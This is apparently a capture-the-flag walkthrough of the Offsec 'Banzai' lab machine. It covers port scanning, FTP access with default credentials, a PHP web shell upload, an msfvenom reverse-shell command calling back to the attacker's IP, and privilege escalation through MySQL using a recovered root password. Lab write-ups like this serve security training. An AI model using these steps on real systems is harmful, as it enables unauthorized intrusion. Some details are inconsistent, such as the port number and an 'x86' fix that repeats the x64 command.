Banzai Walkthrough

Platform: Offsec | PG Practice
Difficulty: MEDIUM
OS: Linux
Author: Pawan Kumar (Vulntricks)

---

🛰️ 1. Reconnaissance

Quick Scanning

using Rustscan to quick scan it .

└─$ rustscan -a $IP -- -sV -sC 

Host is up, received echo-reply ttl 61 (0.078s latency).
Scanned at 2025-08-27 15:08:47 IST for 65s

PORT     STATE SERVICE    REASON         VERSION
21/tcp   open  ftp        syn-ack ttl 61 vsftpd 3.0.3
22/tcp   open  ssh        syn-ack ttl 61 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCybLhvDM6WN4Um6RXgjUecDnd4j/h14PyuqRaLgWRDaQlyWakjDG21gvvltRKiKfDvTHXBS+gDAbGLEmD58g41NE1ocCf5uGtmn79Z3BOR+7BdP1PETWb4a9GR+PdrvXpD16mIHZORhs4RAkeBpexcKOkFXCFatjymyVAcNB8E+Twh879lb55hxEz9cLlA8RAiPPfuW5S7nCRhw7xEi9mdtlvURCFNLb7eCGDUOQu5op2r6XpxZi0eYXJVde/13AiYxvACA2sRoMDCQwIYLhXwpA1Z7LseLxSmMHwyDXrxCU9xDJ+HL9EaHozBdHCOnnuHqPtb5EPZ3/JTg3qnS0dR
|   256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNRPQTMD0l4TqSTmzmck9Rhq1ULCN0ErNvXipXv1HBKoRUgdbdwxhFerbDTxxJYd+12RFoZgNNUDZmSH7+PGvpo=
|   256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDpzo9sh+q0DgrOjD1plfJ9xj9zIjezUBGWzdNlde40M
25/tcp   open  smtp       syn-ack ttl 61 Postfix smtpd
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
5432/tcp open  postgresql syn-ack ttl 61 PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.19
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http       syn-ack ttl 61 Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
8295/tcp open  http       syn-ack ttl 61 Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Banzai
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: Hosts:  banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.

Enumeartion

Eumearting port 21 FTP

Quick check on anonymous login Failed

Enumearting Port 25 SMTP

Looking into the SMTP users from the list I created

└─$ smtp-user-enum -M VRFY -U users.txt -t $IP  

We see there is a banzai user : we can use it later for bruteforcing if we don't see any direct exploit.

Enumearting port 5432 Postgresql

Searching exploit for our version 9.6.4 , Could be vulnearble

PORT 8295 HTTP

On the high level enum I see some names we can consider it user names.

---

Initial Access

Could not find anything so successful so started with some default user and pass in FTP

admin:admin - successful

This is files from the website at port 2985 We can try putting some web shell and then

└─$ ftp -A admin@$IP
Connected to 192.168.237.56.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mput webshell.php
mput webshell.php [anpqy?]? y
200 EPRT command successful. Consider using EPSV.
150 Ok to send data.
100% |**********************************************************************************************************|   311        1.90 MiB/s    00:00 ETA
226 Transfer complete.
311 bytes sent in 00:00 (1.14 KiB/s)
ftp> 

Command execution from web shell

Successfully got a command execution .

And found some more info .

Reverse shell

Attempt 1

Tried reverse shell commands but failed.

Attempt 2

Generated shell using msfveon

─$ msfvenom --payload linux/x64/shell/reverse_tcp  LHOST=192.168.45.181 LPORT=8080 -f elf -o shell.elf

and uploaded in the ftp made it executable and saved in the /tmp directory ,

Again failed with segmentation fault .

Attempt 3

I realized my mistake from the 2nd attempt that the system was 32 bit and exploit created was x64 so failed, I changed the exploit to x86 and it worked.

─$ msfvenom --payload linux/x64/shell/reverse_tcp  LHOST=192.168.45.181 LPORT=8080 -f elf -o shell.elf  

---

Privilege Escalation

Getting TTY shell

which python                                                                                                                                           
/usr/bin/python                                                                                                                                        
python -c 'import pty; pty.spawn("/bin/bash")'                                                                                                         
www-data@banzai:/var/www/html$ whoami 

Reviewing Linpeas result

While looking across files found configuration file

And opening this file gave me user and pass for my sql

and was able to login into the mysql.

www-data@banzai:/tmp$ mysql -u root -p
mysql -u root -p
Enter password: EscalateRaftHubris123

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 5
Server version: 5.7.30 MySQL Community Server (GPL)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Looked around a little nothing useful, looked into the version

Found exploit and VIOLA got the root shell ..

EASY GAME